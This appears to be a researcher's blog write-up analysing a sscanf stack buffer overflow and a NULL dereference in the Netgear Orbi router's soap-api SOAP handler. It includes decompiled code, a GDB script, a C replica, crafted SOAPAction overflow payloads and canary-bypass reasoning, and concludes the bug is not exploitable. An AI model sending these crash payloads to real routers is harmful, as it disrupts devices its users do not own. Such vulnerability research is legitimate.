orbi hunting 0x1: crashes in soap-api

introduction
first find: buffer overflow in SendSoapResponse()
deep dive: SendSoapResponse()
(failed) exploit attempt #1
exploit viability, revisited
stack canary bypass, question mark?
conclusion
references

introduction

The Orbi provides a SOAP server which seems to primarily be used by the Netgear mobile application, reachable at http://<ROUTER>/soap/server_sa. I had originally discovered this endpoint early on when I started looking at this router but it wasn’t until I had connected over serial that I realized it was incredibly easy to crash the binary that handles SOAP requests, /usr/sbin/soap-api. In fact, almost every requests I sent to this endpoing caused a stack trace to be printed to the console. This seemed like a good enough place to start so I decided to figure out exactly what caused these crashes and whether any of it was exploitable.

Note: I chose to write about this issue and not report it to Netgear since merely crashing the soap-api process does very little and doesn’t even really work as a denial-of-service mechanism because a new process is spawned on each request. As far as I can tell there’s no security impact here.

background

The SOAP server parses the HTTP header SOAPAction on incoming requests to determine which SOAP action/method the user wants to trigger. The request is initially handled by lighttpd, where mod_cgi handles initial processing and passes it onto soap-api. The server sets environment variables that describe the request, which soap-api then reads from in order to handle it.

The format of the SOAPAction header is:

<urn:VENDOR:service:ACTION_str:1#METHOD_str .

crash discovery

While doing some manual testing after starting with a known-good SOAPAction header value, I found that server would send the following response when submitting a METHOD_str part that is 248 characters or longer while simultaneously causing a crash dump to be printed to the console .

HTTP/1.1 200 OK
Content-Length: 763
Content-Type: text/xml; charset="UTF-8"
Server: Linux/2.6.15 uhttpd/1.0.0 soap/1.0
Connection: close
Date: Fri, 25 Jun 2021 14:09:01 GMT

<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope
   xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
   SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<m:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAResponse xmlns:m="urn:NETGEAR-ROUTER:service:x:1"></m:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

SOAP Len:0 Action:x Method:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgd = d7854000
[00000000] *pgd=00000000

CPU: 3 PID: 26769 Comm: soap-api Tainted: P             3.14.77 #1
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtask: dce74380 ti: d6014000 task.ti: d6014000
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPC is at 0xb6b52db4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALR is at 0xb6b4ee88
AAAAAAAAAAAAAAAAAAA IP:10.13.13.211

pc : [<b6b52db4>]    lr : [<b6b4ee88>]    psr: 60000010
sp : befff398  ip : 7f5fce58  fp : 7f6026fc
r10: befff424  r9 : befff44c  r8 : befff48c
r7 : befff54c  r6 : befff400  r5 : 7f5d4594  r4 : 00000000
r3 : 00000000  r2 : 00000001  r1 : 00000000  r0 : 00000000
Flags: nZCv  IRQs on  FIQs on  Mode USER_32  ISA ARM  Segment user
Control: 10c5387d  Table: 9785406a  DAC: 00000015
CPU: 3 PID: 26769 Comm: soap-api Tainted: P             3.14.77 #1
[<c021ea68>] (unwind_backtrace) from [<c021bb60>] (show_stack+0x10/0x14)
[<c021bb60>] (show_stack) from [<c03b5518>] (dump_stack+0x78/0x98)
[<c03b5518>] (dump_stack) from [<c02234b0>] (__do_user_fault+0x74/0xbc)
[<c02234b0>] (__do_user_fault) from [<c022385c>] (do_page_fault+0x2f0/0x370)
[<c022385c>] (do_page_fault) from [<c02083dc>] (do_DataAbort+0x34/0x98)
[<c02083dc>] (do_DataAbort) from [<c02096f4>] (__dabt_usr+0x34/0x40)
Exception stack(0xd6015fb0 to 0xd6015ff8)
5fa0:                                     00000000 00000000 00000001 00000000
5fc0: 00000000 7f5d4594 befff400 befff54c befff48c befff44c befff424 7f6026fc
5fe0: 7f5fce58 befff398 b6b4ee88 b6b52db4 60000010 ffffffff

Unfortunately, it was nearly impossible to identify where the crash was actually happening from the crash dump alone as the stack trace only shows the top of the call stack containing chain of calls in the kernel that handled the fault. Since the stack trace was no help, I figured the next step was to load soap-api up in Ghidra and find where the SOAPACtion header was being parsed and trace it through the application, looking for places where it could overflow a buffer.

first find: buffer overflow in SendSoapResponse()

After digging through functions in the binary for a while and looking for strings that looked familiar/related to the output i was getting from the server, I found the following piece of code at function 0x0003e82c. From looking at the non-stripped versions of this binary, I was able to identify this function as SendSoapResponse. This function is responsible for constructing the HTTP response, including the response headers, sent to the client.

ghidra

The overflow occurs on line 48 in the decompiled code shown above as a result of the call to sscanf(). This line parses the SOAP method section from the server response content (<m:AAAAA[...]Response) and writes it to the buffer auStack236 , which is a 64-byte static buffer, without any length checks. At this point I felt pretty confident this was the crash I was seeing in the stack traces, so next I wanted to understand what paths led to this code being executed.

After reading through the code some more I realized almost every request eventually led to SendSoapResponse() (I mean, duh, right?). In general, the flow always goes a little something like this:

main()
- takes care of getting the SOAPAction header from an environment variable SOAP_ACTION or HTTP_SOAPACTION (set by the parent HTTP server (lighttpd) or the CGI handler (modcgi, procgi))
- handles parsing of the SOAP action and SOAP method parts from the header
- saves pointers to the start of each section in the buffer/PTR returned by getenv()
- these ptrs are passed to SoapExecute()
SoapExecute()
- The main function that actually does handling of the various SOAP actions and methods
- Handles authentication checks
- Calls appropriate functions/etc based on submitted actions / method
- at the end of pretty much every case, it calls SendSoapRespCode(), passing the soap_action and soap_method pointers as arguments
SendSoapRespCode()
- Constructs a portion of the HTTP response one of two ways depending on whether the SOAP method was Authenticate or not
- The HTML/XML blob is then passed on to SendSoapResponse() along with the SOAPAction header value
SendSoapResponse()
- Here the final response content is finalized and sent to the client

live debugging

At this point I felt pretty confident I was crashing soap-api from this buffer overflow so I was eager to see whether this bug would be exploitable. The stack traces I was seeing didn’t contain anything that immediately stood out as fishy (0x41s in registers, etc), so I wanted to do some live debugging on the device to validate my theory and poke around in memory. Since I had been unable to build a functional emulation environment where I could run soap-api , I would have to debug on the baremetal. I used a static GDB for armhf downloaded from here: https://github.com/therealsaumil/static-arm-bins and copied it over to the Orbi.

For each request that accesses SOAP functionality, lighttpd forks and (something) eventually executes soap-api to handle this request. I initially had some trouble getting the debugger to catch when soap-api was spawned and stay attached while other forks were created in the background, but eventually found a sequence of gdb commands that allowed me to catch soap-api early and then tell gdb to stay attached.

These were:

create break on main()
set follow-fork-mode child
continue
after sending a request, lighttpd forks and gdb attaches to soap-api and breaks on main()
set follow-fork-mode parent (to prevent new forks from taking over)
continue

This was enough to allow GDB to stay attached to the process up until the SIGSEGV, though there were still other issues that broke backtraces and the lack of debug symbols only made this harder. To avoid having to go through this sequence manually each time, I wrote up a GDB script to set everything up and insert break points on sscanf() and to catch signal 11. Each time the sscanf breakpoint is hit we print a backtrace, frame info, registers, and the 10 words from the current stack pointer, and do the same on segfault.

set width 0
set height 0
set verbose off

set follow-fork-mode child
break main
commands 1
set follow-fork-mode parent
continue
end

break sscanf
commands 2
backtrace full
info frame
info registers
x/10x $sp
continue
end

catch signal 11
commands 3
bt full
i frame
i registers
end

continue

lolwut: a null dereference

With the debugging setup figured out, I attached GDB to the lighttpd process, passed it the script, and then sent a request to trigger the bug — and then I got this:

nullderef

This output seemed to indicate that:

The crash was happening in strcmp in libc.so.1
The crash was actually caused by a NULL dereference when the code attempted to access the address stored in register r0 , which is 0 at the time of the crash

deep dive: SendSoapResponse()

At this point, I was pretty confused. The condition for the crash was definitely tied to the length of the SOAP method and there’s definitely a buffer overflow, but that wasn’t what was causing the bug. I tried different payload lengths and values to see if it caused anything other than a null pointer defer but was unsuccessful. This is when I decided it was time to go back to Ghidra and go through the code line-by-line to try to understand what was happening.

how the payload reaches SendSoapResponse()

The SOAP action and method strings are initially parsed from the SOAPAction HTTP header in main() and these are passed in as arguments to other functions that use them. By the time execution reaches SendSoapResponse(), the method and action strings have been used to construct the SOAP response body by the calling function SendSoapRespCode(). The code snippet below shows how the SOAP body string is constructed:

  char resp[512];
  char *resp_fmt = "<m:%sResponse xmlns:m=\"urn:NETGEAR-ROUTER:service:%s:1\"></m:%sResponse>\r\n<ResponseCode>%03d</ResponseCode>\r\n";
  snprintf(resp_b, 512, resp_fmt, SOAP_METHOD, SOAP_ACTION, SOAP_METHOD, response_code);

Assuming a method “METHOD”, action “ACTION, and response code 404, the resulting string would be:

<m:METHODResponse xmlns:m="urn:NETGEAR-ROUTER:service:ACTION:1"></m:METHODResponse>
<ResponseCode>404</ResponseCode>

snprintf() will read 512 bytes at most, but that can occur in the first format string it inserts if it’s long enough, resulting in no further formatting and the rest of the string being truncated. For example, submitting a method string containing 500 A’s results in the following string:

<m:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAResponse

code breakdown

The code block below is the same as the one shown in the screenshot in the “first find” section earlier in this post but with annotations and renamed variables from after having gone through it all and labeled everything.

Ghidra decompiler output:

/*1*/      if (is_soap_login == 1) {
/*2*/        local_jwt_ptr = (char *)cat_file("/tmp/jwt_local");
/*3*/       fprintf(stream,
/*4*/                "HTTP/1.0 200 OK\r\nContent-Length: %d\r\nContent-Type: text/xml; charset=\"UTF-8\"\r\nS erver: Linux/2.6.15 uhttpd/1.0.0 soap/1.0\r\nSet-Cookie: jwt_local=%s\r\n\r\n"
/*5*/                ,total_content_len,local_jwt_ptr);
/*6*/      }
/*7*/      else {
/*8*/        fprintf(stream,
/*9*/                "HTTP/1.0 200 OK\r\nContent-Length: %d\r\nContent-Type: text/xml; charset=\"UTF-8\"\r\nS erver: Linux/2.6.15 uhttpd/1.0.0 soap/1.0\r\n\r\n"
/*10*/                ,total_content_len);
/*11*/      }
/*12*/      soap_log(2,
/*13*/               "HTTP/1.0 200 OK\r\nContent-Length: %d\r\nContent-Type: text/xml; charset=\"UTF-8\"\r\nSe rver: Linux/2.6.15 uhttpd/1.0.0 soap/1.0\r\n"
/*14*/               ,total_content_len);
/*15*/      fputs(s_<?xml_version="1.0"_encoding="UT_000bd624,stream);
/*16*/      fputs(resp,stream);
/*17*/      fputs(s_</SOAP-ENV:Body>_</SOAP-ENV:Enve_000bd6fc,stream);
/*18*/      soap_log(0,"%s%s%s",s_<?xml_version="1.0"_encoding="UT_000bd624,resp,
/*19*/               s_</SOAP-ENV:Body>_</SOAP-ENV:Enve_000bd6fc);
/*20*/      fflush(stream);

/*21*/      if ((ext_mode == 0) &&
/*22*/         (total_content_len = config_invmatch("installState",&DAT_0008d1a0), total_content_len != 0)) {
/*23*/                        /* OVERFLOW - method_response_buf is 64 bytes and sscanf does not check length
/*24*/                            */
/*25*/        sscanf(resp,"<m:%sResponse%*s",method_response_buf);
/*26*/        strstr_Response_ret = (char *)strstr_wrapper(method_response_buf,"Response");
/*27*/        if (strstr_Response_ret != (char *)0x0) {
/*28*/          *strstr_Response_ret = '\0';
/*29*/        }
/*30*/                        /* POSSIBLE NULL DEREF, strstr_wrapper might return null */
/*31*/        ptr_to_substrings_found = (char *)strstr_wrapper(resp,"service:");
/*32*/        sscanf(ptr_to_substrings_found,"service:%[^:]",service_action_buf);
/*33*/        ptr_to_substrings_found = (char *)strstr_wrapper(resp,"<ResponseCode>");
/*34*/        if (ptr_to_substrings_found != (char *)0x0) {
/*35*/          sscanf(ptr_to_substrings_found,"<ResponseCode>%[^<]",&local_114);
/*36*/        }
/*37*/        vsnprintf_wrap(combined_action_method_str,0x80,"%s:%s",service_action_buf,method_response_buf);
/*38*/        execve_wrapper_maybe
/*39*/                  ("/dev/console",0,3,"/usr/sbin/ra_installevent","soapresponse",
/*40*/                   combined_action_method_str,&local_114,0);
/*41*/        FUN_0001ae0c("ra_install","method=%s, code=%s",combined_action_method_str,&local_114);
/*42*/      }

Arguments:
- FILE *stream: filestream where response will be written (socket back to client?)
- char *resp: a 512 byte buffer containing the body of the XML SOAP response contructed by the calling function (DoSoapRespCode)
Lines 1-20 in the snippet handle constructing and send the response content to the client by writing that content to the file stream passed in as the first argument to SendSoapResponse
- note: this is why the response is always sent no matter
Line 25: a call to sscanf to attempt to parse the SOAP method string
- other functions up the call stack have parsed and placed the method string into an XML component in the resp argument passed to SendSoapResponse
- sscanf searches for the pattern <m:*Response* and will parse the content between the colon up to the end of ‘Response’
- method_response_buf is a static 64 byte buffer
- its possible to overflow this buffer if the string between <m: and Response* is greater than 64 bytes, which appears to be possible to do
Line 26: a call to a strstr wrapper to check for the presence of the string “Response ” in the data that was read into method_response_buf by sscanf
- this wrapper first checks to make sure neither of the two arguments passed to it are NULL
  - if either of them are, it doesn’t call strstr and just returns a NULL pointer
  - if they’re not, it calls strstr and then returns whatever strstr returned; strstr also returns NULL if the string is not found
- If the submitted SOAP method has pushed Response string entirely off of the XML buffer that is constructed, this would return NULL
Line 27-29: if the call to strstr did NOT return NULL (the Response string was found), set the value at the first char of Response to NULL
- This null terminates the string so that only the SOAP method part is parsed by other funcs that stop reading at NULL and the Response part is truncated
Line 31: another call to strstr wrapper, this time checking the resp argument containing the XML constructed by the calling function for the string "service:"
- there is no check after this to see if this returned NULL
Line 32: second call to sscanf that attempts to parse the SOAP action string from the pattern "service:*:" , this time using the value returned by the call to strstr on the previous line as it’s source
- since this value was not checked for NULL before this call to sscanf, this is likely the path taken to reach the crash condition
- this only happens when the method string was sufficiently long to have pushed "service:*:" string off of the XML body buffer resp
Line 33: third call to strstr wrapper, this time searching for the string "<ResponseCode>" in resp otherwise this is skipped
Line 34: if the string was found by the call to strstr in the previous line, sscanf is used to parse out a substring similar to previous calls; otherwise this is just skipped.

takeaways

After going through the code, I knew the following:

It is possible to overflow method_response_buf that the first call to sscanf() writes the method string to.
It is possible to overflow service_action_buf that the second call to sscanf() writes the action string to.
A NULL dereference will occur in the second call to sscanf if the string 'service:' is not found in resp.
1. This will occur if the method string submitted is long enough to cause the SOAP action portion (service:) to be truncated from the final response data in resp

Knowing this, it was clear to see why the payloads I was sending were causing the null dereference: the method strings were sufficiently long to have caused the 'service:' string to be truncated from the end of resp, causing the strstr() call which checks for it to return a null pointer that is then passed to sscanf() without checking if it was null first.

(failed) exploit attempt #1

The results of the code analysis indicated that in order to successfully trigger a crash caused by the buffer overflow, the following conditions would need to be met:

the method string needs to be long enough for the overflow to be useful (i.e. overwriting the return address, base pointer, etc.)
the final contents of resp must include the string 'service:' ]

With this in mind, I went back and spent some time trying payloads I thought would successfully avoid triggering the null defererence but was ultimately unsuccessful. My (incorrect) conclusion was that the conditions necessary to overwrite something important made it impossible to ensure the check for to service string would be passed. I had tried putting it both at the beginning and end of the payload string but this still caused the null deref every time. I had been looking at this bug for a few days at this point and had was pretty exhausted so I just called it at that point and concluded that the even though the buffer overflow was there, it was ‘unreachble’ due to the (incorrect) contstraints I had in mind at the time. Honestly, I was just relieved to be done with it.

exploit viability, revisited

As hinted at above, I did eventually revisit the question of whether the buffer overflow could be triggered a few weeks later and found a way to do it! In fact, it actually happened while I was in the process of writing the first part of this post, where I was basically going to end with section before this one, saying there was no way to get around it. While I was reading through my notes and trying to clean everything up and make sure it all made sense, I noticed I had made some mistakes and incorrect assumptions that had caused me to have an inaccurate understanding of the contstraints. I’ve corrected those mistakes and cleaned things up in the code breakdown above in the interest of clarity but basically I had an incorrect understanding of the constraints and the behavior of sscanf() . Anyway, I updated my mental model of the bug.

With a new understanding of the constraints , I went back to the code and did some more testing to see if it would be possible to overflow method_response_buf while avoiding the NULL deference caused by failing the check for "service:". Assuming this can be done successfully, the program should then crash due to failing a stack canary check. Stack canary protection (as well as PIE and RELRO) was enabled between firmware versions 2.5.1.16 - 2.7.33.

From the GPL archive (soap-api is part of the net-cgi package):

./package/dni/net-cgi/Makefile:TARGET_CFLAGS += -Werror -Wl,-z,now -Wl,-z,relro -fPIE -pie -fstack-protector

local testing

In order to get a better understanding of the actual behavior of the application with a better debugging environment to work in, I wrote the following code to simulate the same behavior on my own system.

int replica (FILE *stream, char *resp) {
	// THE ORDER OF VARIABLES IN MEMORY IS IMPORTANT TO REPRODUCE ACCURATELY (or at least close to accurate)
	int content_len;
	char* jwt;
	char *var2;
	char *var3;
	char *var4;
	char method_buf[64];
	char action_buf[32];
	char combined_action_method[128];
	char *undef1;
	char *undef2;
	int stack_check_val;

	printf("resp: %s\n", resp);

	// fake stack canary
	stack_check_val = 0x313373;
	printf("[+] stack check start: 0x%x\n", stack_check_val);

	// null the buffers
	memset(method_buf, 0, 64);
	memset(action_buf, 0, 32);
	memset(combined_action_method, 0, 128);

	// call sscanf - 1: parse the Method portion from the xml blob in resp
	// and save it to method buf (format is '<m:METHODResponse*'). there is a buffer overflow
	// here if the parsed string is greater than 64 bytes
	printf("[+] sscanf call 1: parse method portion from resp\n");
	sscanf(resp, "<m:%sResponse%*s", method_buf);

	// this would check to confirm that the expected pattern/str was parsed (should still
	// contain the 'Response' portion - a long enough method will cause this to be truncated and we'll
	// fail this check.
	var2 = strstr(method_buf, "Response");
	// but it doesn't really matter because it's only to see if
	if (var2 != (char *)0x0) {
		printf("[+] found 'Response' in method_buf, NULLED\n");
		*var2 = 0x0;
	}

	// ========= Second call to sscanf() and NULL check fail ===========
	// search for service string in resp, no NULL check
	// a long enough METHOD would result in this being truncated, causing strstr
	// to return a NULL pointer
	printf("[+] strstr call 1: check for 'service:' in resp\n");
	var3 = (char *)strstr(resp, "service:");
	// DEBUG -- show when we fail this check
	if (var3 == (char *)0x0) {
		printf("\033[0;31m[!] didn't find 'service:', expect a NULL ptr deref\n\033[0m");
		printf("resp: %s\n", resp);
	}
	printf("[+] sscanf call 2: parse ACTION portion from resp\n");
	sscanf(var3, "service:%[^:]", action_buf);

	// check for <ResponseCode> in resp
	printf("[+] strstr call 2: check for '<ResponseCode>' in resp\n");
	var3 = (char *)strstr(resp, "<ResponseCode>");
	if (var3 != (char *)0x0) {
		// if its there, parse some stuff from it (not important right now)
		printf("[+] found <ResponseCode>, passed check\n");
		undef1 = 0;
	}

	// check if the stack check int was overwritten
	printf("[+] stack check end: 0x%x\n", stack_check_val);
	return 0;
}

int main(int argc, char *argv[]) {
	// args to pass to target func (replicating original)
	FILE *streams = 0;

	// this will hold the payload (i.e. the Method portion we would submit)
	// read from env to make testing easier
	char *payload = getenv("PAYLOAD");
	printf("[+] payload length: %d\n", strlen(payload));

	// construct the response content the same way the server does in SendSoapRespCode()
	char resp_b[512];
	memset(resp_b, 0, 512);
  // this is the fmt string the calling function uses to construct resp
	char *resp_fmt = "<m:%sResponse xmlns:m=\"urn:NETGEAR-ROUTER:service:%s:1\"></m:%sResponse>\r\n<ResponseCode>%03d</ResponseCode>\r\n";
	snprintf(resp_b, 512, resp_fmt, payload, "ConfigSync", payload, 404);

	// call the target function with the payload
	printf("[+] calling target function...\n\n");
	replica(streams, resp_b);
	return 0;
}

I experimented with various payloads using this code and this is when I made a new discovery: different payloads would cause resp to be corrupted in different ways, which would sometimes result in resp containing the ‘service:’ string before the first call to sscanf() but not after. The output below shows this happening with payload one would assume would definitely pass the string check:

-> % ./replica2
[+] payload length: 130
[+] calling target function...

resp: <m:AAservice:AAAAAAAservice:AAAAAAAAAAAAAAAAAAAAAAAAAservice:service:service:service:service:service:service:service:service:service:Response xmlns:m="urn:NETGEAR-ROUTER:service:ConfigSync:1"></m:AAservice:AAAAAAAservice:AAAAAAAAAAAAAAAAA
AAAAAAAAservice:service:service:service:service:service:service:service:service:service:Response>
<ResponseCode>404</ResponseCode>

[+] stack check start: 0x313373
[+] sscanf call 1: parse method portion from resp
[+] found 'Response' in method_buf, NULLED
[+] strstr call 1: check for 'service:' in resp
[!] didnt find 'service:', expect a NULL ptr deref
resp: e:
[+] sscanf call 2: parse ACTION portion from resp
[1]    221258 segmentation fault (core dumped)  ./replica2

After some trial and error I eventually found a payload that would successfully overflow method_buf, avoid the null deref, and overwrite the simulated stack canary:

-> % ./replica2
[+] payload length: 2450
[+] calling target function...

resp: <m:AAservice:AAAAAAAservice:AAAAAAAAAAAAAAAAAAAAAAAAAservice:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:se

[+] stack check start: 0x313373
[+] sscanf call 1: parse method portion from resp
[+] strstr call 1: check for 'service:' in resp
[+] sscanf call 2: parse ACTION portion from resp
[+] strstr call 2: check for '<ResponseCode>' in resp
[+] stack check end: 0x63697672
[1]    221814 segmentation fault (core dumped)  ./replica2

Nice!

now, against the device

With a new payload in hand, I moved back to testing this against the actual device while attached with GDB. After a bit of tweaking to account for differences in memory layout, I eventually noticed that this payload resulted in the process receiving a SIGKILL and dying rather than triggering the SIGSEGV caused by the null dereference.

"x:x:service:ConfigSync:5#AAservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaa"

I modified the GDB script I had been using to break on __stack_chk_fail() instead of sscanf() to confirm and saw this in the output:

stackfail

Finally! The null dereference had been avoided and it was the stack canary check failing that was causing the application to die. After all the trouble I’d gone through digging into this bug, that felt goooooood.

I spent a little more time playing with the payload until I found the exact place where the canary overwrite actually happened and trimmed it down to this:

"x:x:service:ConfigSync:5#AAservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:**BBBBBB**"

Thread 2.1 "soap-api" hit Breakpoint 3, 0xb69aee40 in __stack_chk_fail () from /lib/libc.so.1
#0  0xb69aee40 in __stack_chk_fail () from /lib/libc.so.1
r0             0x0	0
r1             0xb6f01b65	3069188965
r2             **0x42424242**	1111638594
r3             0x5719b01e	1461301278
r4             0x0	0
r5             0xb6a39214	3064173076
r6             0xb6f2bb80	3069361024
r7             0xbe88e4cc	3196642508
r8             0xbe88e40c	3196642316
r9             0xbe88e3cc	3196642252
r10            0xbe88e3a4	3196642212
r11            0xb6f316fc	3069384444
r12            0xb6f2bc6c	3069361260
sp             0xbe88e388	0xbe88e388
lr             0xb6eb2aa8	-1226102104
pc             0xb69aee40	0xb69aee40 <__stack_chk_fail>
cpsr           0x80000010	-2147483632
0x0:	<error: Cannot access memory at address 0x0>
0xb6f01b65:	""
0x42424242:	<error: Cannot access memory at address **0x42424242**>
0x5719b01e:	<error: Cannot access memory at address 0x5719b01e>

stack canary bypass, question mark?

So, after weeks (months?) of poking at this bug on and off and eventually giving up, I’d come back and managed to get back to square one: a buffer overflow that was triggering the stack check fail and crashing the application. Naturally, the next step was to explore ways to get past the stack canary and see if I could get a working exploit going. I’ve only ever dealt with stack canaries in toy examples so this would be my first time trying against a real target and having to do it with the limited debugging environment only made things more difficult.

a primer on SSP

The Stack Smashing Protector (SSP) is a compiler feature specifically design to detect stack-based buffer overflows and abort the program if one is detected to mitigate the potential effects of the memory corruption. There are various implementations of this feature, but they all follow a similar design: the compiler inserts code that copies a value from a global variable into a local variable (the canary) at the start of a function and code to check that this value still matches the value saved in the global variable at the end of the function, before it returns. If the values do not match, the program is immediately terminated to prevent further execution that could result in undefined behavior. The canary is usually inserted into the stack in such a way that it sits immediately before the return address at the edge of the current function’s stack frame — this means a buffer overflow that has successfully corrupted the return address would have also corrupted the canary value, which would result in the canary check failing and the program being aborted before the function returns and attempts to use the corrupted return address.

For GCC’s -fstack-protector, for example:

This is done by adding a guard variable to functions with vulnerable objects. This includes functions that call alloca, and functions with buffers larger than 8 bytes. The guards are initialized when a function is entered and then checked when the function exits. If a guard check fails, an error message is printed and the program exits.

It’s important to note one thing: this protection does not prevent overflows from happening — it’s only meant to detect them and try to mitigate against classic stack overflow exploitation. This means that any code that executes after the overflow has occurred but before the end of the function when the canary is check could be affected by the effects of the memory corruption. Modern implementations do a few things to mitigate against this as well, such as reordering of variable declarations to move non-buffer variables ‘above’ overflow-able buffers so that they cannot be (easily) corrupted and placing all buffers together in memory right before the canary and return address to limit the scope of data that can be corrupted and increasing the likelyhood of overflows overwriting the canary value.

Another important point is that the canary value is set at runtime, so it remains the same for the entire lifetime of the application, as well as if the application forks. New processes started via the shell or execve() will have unique canaries.

I took a look at arch/arm/include/asm/stackprotector.h in the kernel sources for the kernel used by the device (custom fork of 3.14.77) and found this code, showing that for canary is initialized by XORing random bytes against the value of LINUX_VERSION_CODE on ARM architectures:

static __always_inline void boot_init_stack_canary(void)
{
	unsigned long canary;

	/* Try to get a semi random initial value. */
	get_random_bytes(&canary, sizeof(canary));
	canary ^= LINUX_VERSION_CODE;

	current->stack_canary = canary;
	__stack_chk_guard = current->stack_canary;
}

bruteforcing? I guess…not

Generally speaking, there are two ways of going about bypassing the canary check:

Use a separate memory leak vulnerability to leak the canary value so that it can be correctly overwritten
Bruteforce the canary byte-by-byte (only works under certain conditions)

Since I hadn’t found any ways to leak memory, the only real option I would have is bruteforcing. There’s a specific bruteforcing technique that can greatly reduce the total number of attempts needed to determine the canary value by guessing one byte at a time, using the lack of a crash as an oracle to determine when the correct byte has been guessed and repeating this for each byte of the canary. As mentioned above, this only works under certain conditions: the program must keep the same canary between payloads (i.e. fork-and-accept servers) and the code that reads the payload must not append a NULL byte (e.g.read / recv). I found a few good resources that helped me better understand this concept such as this LiveOverflow video and this CTF guide (screenshot below taken from here)

bruteforcing

Seems easy enough, right? I went back to the device and determined the minimum length to overflow the buffer and trigger the stack check fail was 209 characters. After sending only a couple of requests and watching the values in the debugger I quickly realized this wasn’t going to work at all.

The output belows shows the debugger breaking at the start of __stack_chk_fail() with r2 containing the local copy of the stack canary that has been overwritten by a single byte and r3 containing the original. As you can see, the byte that was written was 00 (NULL) — the function that reads the payload into the buffer (sscanf()) appends a NULL. So, the first condition for this to be viable is out.

Thread 2.1 "soap-api" hit Breakpoint 2, 0xb698be40 in __stack_chk_fail () from /lib/libc.so.1
#0  0xb698be40 in __stack_chk_fail () from /lib/libc.so.1
No symbol table info available.
Backtrace stopped: Cannot access memory at address 0x4f532f34
Stack level 0, frame at 0xbecd34c8:
 pc = 0xb698be40 in __stack_chk_fail; saved pc = 0xb6e8faa8
 Outermost frame: Cannot access memory at address 0x4f532f34
 Arglist at 0xbecd34c8, args:
 Locals at 0xbecd34c8, Previous frame's sp is 0xbecd34c8
r0             0x0      0
r1             0xb6edeb65       3069045605
**r2             0xb710d200       3071332864**
r3             0xb710d29e       3071333022
r4             0x0      0
r5             0xb6a16214       3064029716
r6             0xb6f08b80       3069217664
r7             0xbecd360c       3201119756
r8             0xbecd354c       3201119564
r9             0xbecd350c       3201119500
r10            0xbecd34e4       3201119460
r11            0xb6f0e6fc       3069241084
r12            0xb6f08c6c       3069217900
sp             0xbecd34c8       0xbecd34c8
lr             0xb6e8faa8       -1226245464
pc             0xb698be40       0xb698be40 <__stack_chk_fail>
cpsr           0x80000010       -2147483632

Not only that, the canary value was changing in between each request. In retrospect, this is obvious since soap-api is not forking itself to handle the requests, but instead being execve‘ed at some point after lighttpd forks.

So, yeah — (smarter) bruteforcing was out of the question. Since along the way I’d also learned PIE and RELRO was enabled on the binary, I called it quits at this point and feel pretty confident in saying this isn’t an exploitable issue.

conclusion

This turned out to be a long journey that gave me a chance to become more familiar with some of the internals of this system. It also forced me to get creative in finding ways to debug and test things out, which taught me some new tricks. In the end, I was able to definitively confirm the buffer overflow could be reached, but the mitigations in place combined with the nuances of the environment proved to be enough to thwart my exploitation attempts.

